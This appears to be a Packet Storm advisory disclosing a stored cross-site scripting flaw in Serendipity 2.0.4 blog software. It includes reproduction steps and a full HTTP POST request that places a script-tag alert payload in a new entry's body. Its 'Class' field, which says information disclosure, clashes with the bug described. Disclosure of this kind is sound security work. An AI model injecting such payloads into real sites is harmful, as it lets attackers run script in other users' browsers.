S9Y Serendipity 2.0.4 Cross Site Scripting

2016-10-31T00:00:00
ID PACKETSTORM:139433
Type packetstorm
Reporter Besim
Modified 2016-10-31T00:00:00

Description

                                        
                                            `========================================  
Title: Serendipity-2.0.4 (latest version) - Stored Cross Site Scripting  
Application: Serendipity  
Class: Sensitive Information disclosure  
Versions Affected: <= latest version   
Vendor URL: http://docs.s9y.org/  
Software URL: http://docs.s9y.org/downloads.html  
Bugs: Persistent Cross Site Scripting  
Date of found: 29.10.2016  
Author: Besim  
========================================  
  
2.CREDIT  
========================================  
Those vulnerabilities was identified by Meryem AKDOAAN and Besim ALTINOK  
  
  
3. VERSIONS AFFECTED  
========================================  
<= latest version  
  
  
4. TECHNICAL DETAILS & POC  
========================================  
  
Stored Cross Site Scripting (No Admin Required)  
========================================  
  
1) Editor login panel  
2) User click 'New Entry'  
3) Attacker(normal user) enter xss payload to 'Entry Body' input   
4) Vulnerability Parameter and Payload : &body=<Script>alert('Meryem ExploitDB')</Script>  
  
### HTTP Request ###  
  
POST /serendipity/serendipity_admin.php? HTTP/1.1  
Host: site_name  
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://site_name/serendipity/serendipity_admin.php?serendipity[adminModule]=entries&serendipity[adminAction]=new  
Cookie: ---  
Connection: close  
Upgrade-Insecure-Requests: 1  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 762  
  
- POST DATA  
  
serendipity[action]=admin  
&serendipity[adminModule]=entries  
&serendipity[adminAction]=save  
&serendipity[id]=  
&serendipity[timestamp]=1477314176  
&serendipity[preview]=false  
&serendipity[token]=324fa32a404e03de978d9a18f86a3338  
&serendipity[title]=New Page  
&serendipity[body]=<Script>alert('Meryem ExploitDB')</Script>  
&serendipity[extended]=  
&serendipity[chk_timestamp]=1477314176  
&serendipity[new_timestamp]=2016-10-24 15:02  
&serendipity[isdraft]=false  
&serendipity[allow_comments]=true  
&serendipity[had_categories]=1  
&serendipity[propertyform]=true  
&serendipity[properties][access]=public  
&ignore_password=  
&serendipity[properties][entrypassword]=  
&serendipity[change_author]=4  
  
`